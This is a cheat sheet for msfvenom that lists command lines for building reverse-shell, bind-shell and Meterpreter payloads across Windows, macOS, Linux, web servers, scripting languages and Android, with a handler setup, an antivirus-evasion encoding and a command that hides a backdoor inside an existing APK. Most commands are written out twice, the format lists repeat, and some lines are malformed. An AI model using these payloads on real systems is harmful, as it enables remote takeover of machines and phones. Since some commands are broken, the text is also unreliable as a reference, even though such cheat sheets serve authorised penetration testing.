MsfVenom Payload Cheat Sheet

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options.

Content Replace To

ip-address => Attacker ip address

port => Attacker port

Metasploit Payload Listener

msfdb run
use exploit/multi/handler
set payload-name
set ip-address
set port
Run

Windows Payloads

Windows Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

1	msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Reverse Shell

msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

1	msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Encoded Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe

1	msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe

Windows Meterpreter Reverse Shellcode

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform

1	msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform

macOS Payloads

macOS Bind Shell

msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho

1	msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho

macOS Reverse Shell

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho

1	msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho

macOS Reverse TCP Shellcode

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform

1	msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform

Linux Payloads

Linux Meterpreter TCP Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf

1	msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind TCP Shell

 msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

1	msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind Meterpreter TCP Shell

 msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

1	msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Meterpreter Reverse Shellcode

 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform

1	msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform

Web-base Payloads

PHP Meterpreter Reverse Shell

 msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php

1	msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php

JSP Java Meterpreter Reverse Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp

1	msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp

ASP Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp

1	msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp

WAR Reverse TCP Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war

1	msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war

Script-Base Payloads

Perl Unix Reverse shell

 msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl

1	msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl

Bash Unix Reverse Shell

 msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh

1	msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh

Python Reverse Shell

 msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py

1	msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py

Android Payloads

Android Meterpreter reverse Payload

msfvenom –p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk

1	msfvenom –p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk

Android Embed Meterpreter Payload

msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk

1	msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk

MsfVenom Payload Formate

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    sh
    vbapplication
    vbscript

Name

----

asp

aspx

aspx-exe

axis2

dll

elf

elf-so

exe

exe-only

exe-service

exe-small

hta-psh

jar

jsp

loop-vbs

macho

msi

msi-nouac

osx-app

psh

psh-cmd

psh-net

psh-reflection

vba

vba-exe

vba-psh

vbs

war

Framework Transform Formats [--format <value>]

==============================================

Name

----

bash

csharp

dword

hex

java

js_be

js_le

num

perl

powershell

ps1

python

raw

ruby

vbapplication

vbscript